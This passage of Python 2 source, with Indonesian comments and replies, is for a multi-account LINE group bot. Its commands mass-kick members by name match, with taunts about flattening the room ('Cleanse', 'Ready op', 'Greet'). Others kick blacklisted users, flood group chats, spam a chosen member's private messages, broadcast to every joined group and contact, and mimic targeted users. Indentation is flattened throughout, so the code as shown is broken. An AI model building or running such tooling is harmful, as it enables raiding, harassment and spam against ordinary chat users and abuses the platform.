cl.sendText(msg.to, "✔ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰\nRead : %s\n\n✖ Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
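# "Cleanse<text>": kicks every member whose display name contains <text> (an empty remainder matches everyone), skipping ids in Bots or admin; each kick is issued by a randomly chosen helper bot.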
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["One piece","Kr asup"]: #Panggil Semua Bot
if msg.from_ in owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.from_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Kabur all"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Kabur"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
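# "Emak" mentions every member in one message by building MENTION metadata by hand; "Abah" mentions members in batches of 100 for groups of up to 500 members.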
elif msg.text in ["Emak"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Abah"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
if jml <= 100:
    mention2(msg.to, nama)
elif jml <= 500:
    # mention in chunks of 100 so no member index is skipped
    for i in range(0, jml, 100):
        mention2(msg.to, nama[i:i+100])
else:
    cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
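# "Kill ": kicks every group member whose mid is on the blacklist, using a randomly chosen bot for each kick.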
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagidevil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Ready op" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready op","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah Tollll;")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots or target in admin:
    pass
else:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
gs = cl.getGroup(msg.to)
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
elif "Tajong " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Tajong ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
satpam.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
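# "Mid @<name>": replies with the mid (LINE user id) of any member whose display name matches exactly.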
elif "Mid @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
#-------------Fungsi Spam Finish---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
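# "Spamcontact @<name>": floods the matched member's private chat with repeated messages from cl and kk, then confirms in the group.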
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
cl.sendText(g.mid,"Masuk Room Woy")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Masuk Room Woyp")
kk.sendText(g.mid,"Masuk Room Woy")
kk.sendText(g.mid,"Masuk Room Woy")
kk.sendText(g.mid,"Masuk Room Woy")
kk.sendText(g.mid,"Masuk Room Woy")
cl.sendText(msg.to, "Target Spam, Done...!!!")
kk.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Jangan berharap")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati�","Ida�","Uke�","Alyn�","Ikka�","Yunikey�","Qwenie�","Gendis�","Aryani�","Nindy�","Wina�","Dewi�","Ifah�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun�","Ahmad khan�","Hajir�","Dd�","Indra�","Jeong�","Yogi�","Ary�","Ucil�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
#-------------------Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
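# "GBc <text>": broadcasts <text> from every bot to the group list returned by the last getGroupIdsJoined() call; "Bc <text>" repeats it in the current chat via the helper bots.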
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot kadieu"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sayonara, Bye bye all...!!!")
else:
cl.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body Har Har")
kk.sendText(msg.to,"Hai Every Body Har Har")
kc.sendText(msg.to,"Hai Every Body Har Har")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
kk.sendText(msg.to,"★★★")
ki.sendText(msg.to,"★★★★")
cl.sendText(msg.to,"★★★★★")
kc.sendText(msg.to,"★★★★★★")
ks.sendText(msg.to,"★★★★★★★")
random.choice(KAC).sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰]")
#-------------Fungsi Respon Finish---------------------#
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
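# Mimic relay: if the sender is a registered mimic target while mimic is enabled, the helper bots repeat their text, stickers (contentType 7) and contacts (contentType 13) into the chat.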
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
k1.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
